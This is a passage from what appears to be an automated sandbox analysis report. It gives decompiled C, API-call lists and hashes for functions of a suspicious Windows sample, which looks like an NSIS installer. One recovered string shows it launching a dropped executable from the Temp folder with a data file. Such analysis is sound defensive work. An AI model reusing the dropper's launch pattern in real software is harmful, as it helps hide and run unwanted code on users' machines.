                            • GetDlgItem.USER32 ref: 00405054
                            • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                            • LoadImageW.USER32 ref: 004050B5
                            • SetWindowLongW.USER32 ref: 004050CE
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                            • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                            • DeleteObject.GDI32(00000000), ref: 0040512B
                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                              • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                            • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                            • SetWindowLongW.USER32 ref: 0040527D
                            • ShowWindow.USER32(?,00000005), ref: 0040528D
                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                            • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                            • GlobalFree.KERNEL32 ref: 0040546B
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                            • ShowWindow.USER32(?,00000000), ref: 00405615
                            • GetDlgItem.USER32 ref: 00405620
                            • ShowWindow.USER32(00000000), ref: 00405627
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                            • String ID: $M$N
                            • API String ID: 2564846305-813528018
                            • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                            • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                            • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                            • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}


















                            0x00404795
                            0x004048c2
                            0x0040491f
                            0x00404923
                            0x004049f0
                            0x004049f2
                            0x004049f2
                            0x004049f8
                            0x004049f8
                            0x004049fb
                            0x00000000
                            0x00404a02
                            0x00404931
                            0x00404937
                            0x00404941
                            0x0040494c
                            0x0040494f
                            0x00404952
                            0x0040495d
                            0x00404960
                            0x00404967
                            0x00404974
                            0x00404985
                            0x0040498b
                            0x00404993
                            0x004049a1
                            0x004049a7
                            0x004049a7
                            0x00404967
                            0x004049b1
                            0x00000000
                            0x004049bc
                            0x004049c0
                            0x004049d0
                            0x004049d0
                            0x004049d6
                            0x004049e2
                            0x004049e2
                            0x00000000
                            0x004049e6
                            0x004049b1
                            0x004048cd
                            0x00000000
                            0x004048df
                            0x004048e4
                            0x004048ea
                            0x00000000
                            0x00000000
                            0x00404913
                            0x00404915
                            0x0040491a
                            0x00000000
                            0x0040491a
                            0x004048cd
                            0x0040479b
                            0x0040479e
                            0x004047a3
                            0x004047b4
                            0x004047b4
                            0x004047bc
                            0x004047bf
                            0x004047c3
                            0x004047c6
                            0x004047ca
                            0x004047cd
                            0x004047d0
                            0x004047d3
                            0x004047da
                            0x004047dc
                            0x004047dc
                            0x004047e6
                            0x004047f3
                            0x004047fd
                            0x00404802
                            0x00404805
                            0x0040480a
                            0x00404821
                            0x00404828
                            0x0040483b
                            0x0040483e
                            0x00404852
                            0x00404859
                            0x0040485e
                            0x00404863
                            0x00404863
                            0x00404871
                            0x0040487f
                            0x00404891
                            0x00404896
                            0x004048a6
                            0x004048a8
                            0x00000000

                            APIs
                            • CheckDlgButton.USER32 ref: 00404821
                            • GetDlgItem.USER32 ref: 00404835
                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                            • GetSysColor.USER32(?), ref: 00404863
                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                            • lstrlenW.KERNEL32(?), ref: 00404884
                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                            • GetDlgItem.USER32 ref: 004048FF
                            • SendMessageW.USER32(00000000), ref: 00404906
                            • GetDlgItem.USER32 ref: 00404931
                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                            • SetCursor.USER32(00000000), ref: 00404985
                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                            • SetCursor.USER32(00000000), ref: 004049A1
                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                            Strings
                            • "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq, xrefs: 00404960
                            • N, xrefs: 0040491F
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                            • String ID: "C:\Users\user\AppData\Local\Temp\afhjjq.exe" C:\Users\user\AppData\Local\Temp\areuvasydgv.tlq$N
                            • API String ID: 3103080414-3937016478
                            • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                            • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                            • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                            • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                            0x004062ae
                            0x004062b7
                            0x004062be
                            0x004062c8
                            0x004062dc
                            0x00406304
                            0x0040630b
                            0x0040630f
                            0x00406313
                            0x00406333
                            0x0040633a
                            0x00406344
                            0x00406351
                            0x00406356
                            0x0040635b
                            0x0040635f
                            0x0040636e
                            0x00406370
                            0x0040637d
                            0x00406381
                            0x0040641c
                            0x00000000
                            0x00406397
                            0x004063a4
                            0x004063c8
                            0x004063cc
                            0x004063eb
                            0x004063ef
                            0x004063ef
                            0x004063f1
                            0x004063fa
                            0x00406405
                            0x00406410
                            0x00406416
                            0x00000000
                            0x00406416
                            0x004063ce
                            0x004063d1
                            0x004063dc
                            0x004063d8
                            0x004063da
                            0x004063db
                            0x004063db
                            0x004063e3
                            0x004063e5
                            0x00000000
                            0x004063e5
                            0x004063af
                            0x004063b5
                            0x00000000
                            0x004063b5
                            0x00406381
                            0x0040635f
                            0x004062de
                            0x004062e9
                            0x004062f2
                            0x004062f6
                            0x00000000
                            0x00000000
                            0x004062f6
                            0x00406427

                            APIs
                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                            • GetShortPathNameW.KERNEL32 ref: 004062F2
                              • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                              • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                            • GetShortPathNameW.KERNEL32 ref: 0040630F
                            • wsprintfA.USER32 ref: 0040632D
                            • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                            • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                            • GlobalFree.KERNEL32 ref: 00406416
                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                              • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\YSpCB8DEek.exe,80000000,00000003), ref: 0040615C
                              • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                            • String ID: %ls=%ls$[Rename]$mB$uB$uB
                            • API String ID: 2171350718-2295842750
                            • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                            • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                            • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                            • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                            Download Yara Rule
                            C-Code - Quality: 90%
                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                            0x0040100a
                            0x00401039
                            0x00401047
                            0x0040104d
                            0x00401051
                            0x0040105b
                            0x00401061
                            0x00401064
                            0x004010f3
                            0x00401089
                            0x0040108c
                            0x004010a6
                            0x004010bd
                            0x004010cc
                            0x004010cf
                            0x004010d5
                            0x004010d9
                            0x004010e4
                            0x004010ed
                            0x004010ef
                            0x004010ef
                            0x00401100
                            0x00401105
                            0x0040110d
                            0x00401110
                            0x00401112
                            0x00401118
                            0x0040111f
                            0x00401126
                            0x00401130
                            0x00401142
                            0x00401156
                            0x00401160
                            0x00401165
                            0x00401165
                            0x00401110
                            0x0040116e
                            0x00000000
                            0x00401178
                            0x00401010
                            0x00401013
                            0x00401015
                            0x0040101f
                            0x0040101f
                            0x00000000

                            APIs
                            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                            • BeginPaint.USER32(?,?), ref: 00401047
                            • GetClientRect.USER32 ref: 0040105B
                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                            • FillRect.USER32 ref: 004010E4
                            • DeleteObject.GDI32(?), ref: 004010ED
                            • CreateFontIndirectW.GDI32(?), ref: 00401105
                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                            • SelectObject.GDI32(00000000,?), ref: 00401140
                            • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                            • DeleteObject.GDI32(?), ref: 00401165
                            • EndPaint.USER32(?,?), ref: 0040116E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                            • String ID: F
                            • API String ID: 941294808-1304234792
                            • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                            • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                            • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                            • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 72%
                            			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x42923c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x42a298 + _t44 * 2;
				_t45 = 0x428200;
				_t108 = 0x428200;
				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E00406668(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
							_t82 =  *_t105;
							_a8 = _t82;
							if(_t82 != 0) {
								_t81 = _a8;
								continue;
							}
							goto L43;
						}
						_t84 =  *((intOrPtr*)(_t105 + 1));
						_t47 =  *_t105;
						_t48 = _t47 & 0x000000ff;
						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
						_t85 = _t84 & 0x000000ff;
						_v28 = _t48 | 0x00008000;
						_t77 = 2;
						_v16 = _t85;
						_t105 = _t105 + _t77;
						_v24 = _t48;
						_v20 = _t85 | 0x00008000;
						if(_a8 != _t77) {
							__eflags = _a8 - 3;
							if(_a8 != 3) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									__eflags = (_t48 | 0xffffffff) - _v12;
									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
								}
								L38:
								_t108 =  &(_t108[lstrlenW(_t108)]);
								_t45 = 0x428200;
								goto L42;
							}
							_t78 = _v12;
							__eflags = _t78 - 0x1d;
							if(_t78 != 0x1d) {
								__eflags = (_t78 << 0xb) + 0x42b000;
								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
							} else {
								E004065AF(_t108,  *0x42a268);
							}
							__eflags = _t78 + 0xffffffeb - 7;
							if(__eflags < 0) {
								L29:
								E004068EF(_t108);
							}
							goto L38;
						}
						if( *0x42a2e4 != 0) {
							_t77 = 4;
						}
						_t121 = _t48;
						if(_t48 >= 0) {
							__eflags = _t48 - 0x25;
							if(_t48 != 0x25) {
								__eflags = _t48 - 0x24;
								if(_t48 == 0x24) {
									GetWindowsDirectoryW(_t108, 0x400);
									_t77 = 0;
								}
								while(1) {
									__eflags = _t77;
									if(_t77 == 0) {
										goto L26;
									}
									_t59 =  *0x42a264;
									_t77 = _t77 - 1;
									__eflags = _t59;
									if(_t59 == 0) {
										L22:
										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
										__eflags = _t61;
										if(_t61 != 0) {
											L24:
											 *_t108 =  *_t108 & 0x00000000;
											__eflags =  *_t108;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v8, _t108);
										_a8 = _t61;
										__imp__CoTaskMemFree(_v8);
										__eflags = _a8;
										if(_a8 != 0) {
											goto L26;
										}
										goto L24;
									}
									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
									__eflags = _t63;
